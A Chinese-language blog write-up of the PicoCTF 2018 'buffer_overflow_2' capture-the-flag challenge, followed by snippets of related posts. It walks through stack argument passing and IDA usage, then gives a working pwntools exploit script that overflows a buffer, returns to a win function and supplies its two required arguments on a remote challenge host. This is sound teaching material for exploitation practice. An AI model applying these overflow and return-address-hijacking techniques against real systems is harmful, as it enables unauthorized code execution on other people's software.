PicoCTF_2018_buffer_overflow_2详细wp

最新推荐文章于 2024-04-25 23:17:25 发布
最新推荐文章于 2024-04-25 23:17:25 发布
阅读量3k 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46204503/article/details/121294547
版权

PicoCTF_2018_buffer_overflow_2

知识点

  1. 函数调用栈机制(栈溢出)
  2. 栈传参
    • 32位程序栈传参,以逆序传入参数,即最后一个参数在最高地址
    • 64位程序前6个参数是寄存器传参,前6个参数分别存在rdi、rsi、rdx、rcx、r8、r9

little trick

  1. 如何将一个数转化成底层的二进制的机器码

    1. 手算

    2. 网上找在线工具,这里不做介绍

    3. 在IDA中看汇编代码

      image-20211112191508645

      因为c代码都可以当做一组汇编指令,比如从上述的0x804861D开始到0x804862D四句汇编指令,就是相当于if ( a1 == -559038737 && a2 == -559038242 )这一条代码,学了汇编之后大家应该都能明白。

攻击思路

  1. 发现后门win函数,其功能大致为:

    image-20211112192458339

  2. 栈溢出,修改previous_eip位置,用来控制指令执行流程,返回到后门函数地址

  3. 并且把参数位置覆盖为对应的值,使得程序能够输出flag.txt文件内容

执行攻击

  1. checksec,查看保护机制

    image-20211112192713214

  2. 可以执行栈溢出,寻找后门函数位置,为0x80485CB

    利用IDA查看

    f5:反编译为c代码

    tap键可以切换c代码和汇编代码,在对应c代码界面可以跳转到对应汇编代码处

    空格键可以切换显示的汇编代码为:关系图或者内存图

    内存图时在代码前有其对应地址

exp

from pwn import *	#导入工具包
io=remote("node4.buuoj.cn",29406) #链接远端程序

io.recvuntil(b"Please enter your string: ")	#接收程序的输出数据
sh=0x80485CB
#溢出偏移为0x6c+4,0xdeadbeef为垃圾数据,可任意填写,但要注意填满4字节,p32()自动将数据填充为4字节
payload=b'a'*0x70+p32(sh)+p32(0xdeadbeef)+p32(0x0DEADBEEF)+p32(0x0DEADC0DE)
io.sendline(payload)	#向程序发送payload,程序的gets(s)函数会接收该部分数据
#程序已经攻击成功,由printf输出了flag,可以使用io.recv()接收程序输出,或者io.interactive()也会有回显
io.interactive()	
#print(io.recv())
Der_
关注
ring-buffer-design.rar_V2 _buffer_ring_buffer
09-24
`ring-buffer-design.txt`可能是一个文档,详细解释了环形缓冲区的设计原理、实现细节以及在Linux v2.13.6中的具体用法。通过分析这份文档,我们可以更深入地理解无锁环形缓冲区在实际系统中的应用和优势。 总结...
picoctf_2018_buffer overflow 2
qq_62887641的博客
09-26 137
32位,只开了NX很简单的程序栈溢出并且有后门函数后门函数需要。
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 386
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
BUUCTF pwn——picoctf_2018_buffer overflow 2
CNS-Enterprise BCC-1701-J
05-20 125
BUUCTF 做题练习
picoCTF2019--logon
cyjmosthandsome的博客
11-14 767
1. 记录做这道题时学到的一些知识点 在username输入admin登录时,显示No flag for you,F12查看请求包,发现cookies栏显示admin=False 然后就想到用burp抓包将cookie中的admin改为True 2. 遇到的问题 利用burp直接抓包,抓到的第一个包如下 直接send包,得到的response如下 然后follow the ...
picoctf_2018_buffer_overflow_2
z1r0的博客
12-11 192
picoctf_2018_buffer_overflow_2 查看保护 有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:
mysql read_buffer_size 设置多少合适
09-10
2. `read_buffer_size`:同样,32MB可能过高,可以调整为8MB,与`sort_buffer_size`保持一致。 3. `read_rnd_buffer_size`:用于随机读取排序,16MB过大,建议改为8MB。 4. `table_open_cache`:初始设置为512较小,...
rx_reorder.rar_The Ring_ring buffer
09-24
在IT行业中,尤其是在网络通信和实时系统领域,"rx_reorder.rar_The Ring_ring buffer"这一主题涉及到的关键技术是接收端的数据重排序(Reordering)和环形缓冲区(Ring Buffer)。在这里,我们主要探讨这两方面的...
buffer-format.rar_V2
09-21
`buffer-format.txt`中的详细信息可以帮助他们了解如何正确创建、更新和维护initramfs镜像,而`binder_trace.c`则提供了深入理解Android系统内部工作原理的窗口,尤其是在性能调优和故障排查时。 总的来说,`buffer...
Buffer_text.zip_buffer text_将数组存放BUFFER
09-23
2. **写入数据**:`buffer.write(string[, offset][, length][, encoding])`,向Buffer中写入字符串或二进制数据。 3. **访问单个字节**:`buffer[i]`,可以通过索引来访问和修改Buffer中的每个字节。 4. **拷贝...
picoCTF,Web Exploitation,网页开发类,39/45
Allezima阿力代码
02-10 3212
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
[BUUCTF]PWN——picoctf_2018_buffer overflow 2
BangSen1的博客
03-31 535
picoctf_2018_buffer overflow 2 例行检查,32位,开启NX保护 运行一下, 用IDA打开。看到了flag.txt,跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时,输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x
picoCTF - RE - Shop writeup
yyyayo的博客
07-10 243
from pwn import * p = remote("mercury.picoctf.net", 24851) p.recv() p.sendline("0") p.recv() p.sendline("-6") # The program doesn't ensure the input is not negative. Or it should use unsigned int variables. p.recv() p.sendline("2") p.recv() p.sendline("
PicoCTF——Most Cookie思路讲解
最新发布
npu2022303155的博客
04-25 900
1. 并没有手把手的步骤,只有一些经验。 2. 会有一些抓包图片来帮助理解,只是不知道有没有多此一举。
BUUCTF:PicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 929
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 417
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
picoCTF2020_Web
煤矿路口西的博客
11-11 740
picoCTF Web Exploitation Insp3ct0r Insp3ct0r How do you inspect web code on a browser?There’s 3 parts ctrl+u看源码->1/3 of the flag: picoCTF{tru3_d3 mycss.css看源码-> 2/3 of the flag: t3ct1ve_0r_ju5t myjs.js看源码->3/3 of the flag: _lucky?2e7b23e3} w.
dp_debug_check_buffer_overflow
05-25
dp_debug_check_buffer_overflow 是一个调试函数,用于检测缓冲区溢出的情况。当程序运行时,如果发现有缓冲区溢出的情况,就会触发 dp_debug_check_buffer_overflow 函数,并打印出相应的调试信息,以便程序员进行调试。 这个函数通常在开发过程中使用,可以帮助程序员及时发现并解决缓冲区溢出的问题,提高程序的稳定性和可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值